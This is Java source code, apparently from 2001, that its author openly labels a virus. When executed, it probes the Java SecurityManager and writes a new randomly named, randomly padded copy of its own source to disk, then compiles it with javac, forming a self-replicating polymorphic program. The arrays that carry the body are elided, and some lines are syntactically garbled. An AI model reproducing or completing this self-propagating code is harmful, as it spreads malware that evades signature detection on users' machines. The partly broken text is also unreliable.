/** base for a JavaVirus (c) Holger 'Lynxx' Hippenstiel on 17.01.2001 Homepage: http://holger.hippenstiel.org Email: lynxx@uni.de Copy the Class-File to any Dir, compile and execute this class and you get a new Virus_RANDOM.java */ import java.io.*; import java.util.*; final class Virus { public static void main(String[]argv) { int[]r={ ... (Look in the Source) }; int[]s={ ... (Look in the Source) }; int[]t={ ... (Look in the Source) }; boolean bFileSuccess=false; boolean bRunSuccess=false; String strName=null; String strSource=null; String strExec=null; try { // Trailer ... p("Java viruses are impossible ? Ok let's see ..."); // Create a random name String strRnd=""; Random rnd=new Random(); int l=((rnd.nextInt()&mask)%3)+2; for (int i=0;i<l;i++) strRnd+=Integer.toString((rnd.nextInt()&mask),36); l=((rnd.nextInt()&mask)%3)+4; for (int i=0;i<l;i++) { int z=(rnd.nextInt()&mask)%(strRnd.length()-2)+1; strRnd=strRnd.substring(0,z)+(i%4==0?&"_":strRnd.substring(z,z+1).toUpperCase())+ strRnd.substring(z,strRnd.length()); } strRnd=Integer.toString(((rnd.nextInt()&mask)%26+10),36).toUpperCase()+strRnd; String strSep=File.separator; // Windows or Unix ? if (strSep.equals("\\")) strSep=""; else strSep="."+strSep; strName="Virus_"+strRnd; strSource=strSep+strName+".java"; strExec="javac -O -nowarn "+strSource; // Let's have a look what's allowed ... SecurityManager sm=System.getSecurityManager(); if (sm!=null) { p("SecurityManager installed, will check what's allowed ..."); boolean bWriteAllowed=true; try { sm.checkWrite(strSource); } catch(Exception e){ bWriteAllowed=false; } p("Write of file '"+strSource+"' is "+(bWriteAllowed?"":"NOT ")+"allowed !"); boolean bExecAllowed=true; try { sm.checkExec(strExec); } catch(Exception e){ bExecAllowed=false; } p("Execute of '"+strSource+"' is "+(bExecAllowed?"":"NOT ")+"allowed !"); } else p("No SecurityManager for this Thread, i could do everything !"); // Create a new sourcefile PrintWriter o=new PrintWriter(new FileOutputStream(strSource)); // Write '/** base for a JavaVirus'... x(o,r); // Write Virusname o.write(strName); // Write '{ public static void main'... x(o,s); // Write 'int[]?????={'... to randomize Virus further int ran[]=new int[((rnd.nextInt()&mask)%1024)+4]; // Random length for(int i=0;i<ran.length;)ran[i++]=rnd.nextInt(); // Random contents w(o,0,ran); // Write 'int[]r={'... w(o,114,r); // Write 'int[]s={'... w(o,115,s); // Write 'int[]t={'... w(o,116,t); // Write 'try {'... x(o,t); // Close the new sourcefile o.close(); bFileSuccess=true; // Compile the new Virus ... bRunSuccess=ex(strExec); } catch(Exception e){ p("Whoops ! Exception: "+e); } if (bFileSuccess) { p("A new Virus '"+strName+"' is born ..."); p("It was written to disk"+(bRunSuccess?" and":" but not")+" compiled."); } else p("I'm unable to spawn a new virus !"); } private static boolean ex(String strLine) { boolean bRetval=true; Process pr=null; try{ pr=Runtime.getRuntime().exec(strLine); BufferedReader in=new BufferedReader(new InputStreamReader(pr.getInputStream())); String strALine=null; boolean bFirstout=true; while ((strALine=in.readLine())!=null){ if(bFirstout){ bFirstout=false; p("Process '"+strLine+"'produced output:"); } p(strALine); } } catch (Exception e) { bRetval=false; } if(bRetval)bRetval=pr.exitValue()==0; return bRetval; } private static void p(String t){ System.out.println(t); } private static void x(PrintWriter o,int a[]){ byte b[]=new byte[a.length*4]; int k=0; for(int i=0;i<a.length;){ int v=a[i++]; for(int j=0;j<4;j++){ byte c=(byte)(v>>((3-j%4)*8)&0xff); if(c!=0)b[k++]=c; } } o.write(new String(b,0,k)); } private static void w(PrintWriter o,int n,int a[]){ // ' int[]n={'... byte b[]={32,32,105,110,116,91,93}; byte c[]={61,123,10,32,32,32}; for(int i=0;i<b.length;) o.write(b[i++]); if(n!=0) o.write((byte)n); else{ // Random name ! Random rnd=new Random(); int l=((rnd.nextInt()&mask)%32)+5; for (int i=0;i<l;i++){ o.write((byte)('a'+(rnd.nextInt()&mask)%26)); } } for(int i=0;i<c.length;) o.write(c[i++]); for(int i=0;i<a.length;) o.print("0x"+Integer.toHexString(a[i++])); if(i!=a.length) // No ',' after last entry o.write(44); if(i!=0&&i%6==0){ // put a return after 6 Numbers o.write(10); o.write(32); o.write(32); o.write(32); } } // '};' o.write(10); o.write(32); o.write(32); o.write(125); o.write(59); o.write(10); } private final static int mask=0x7fffffff; }
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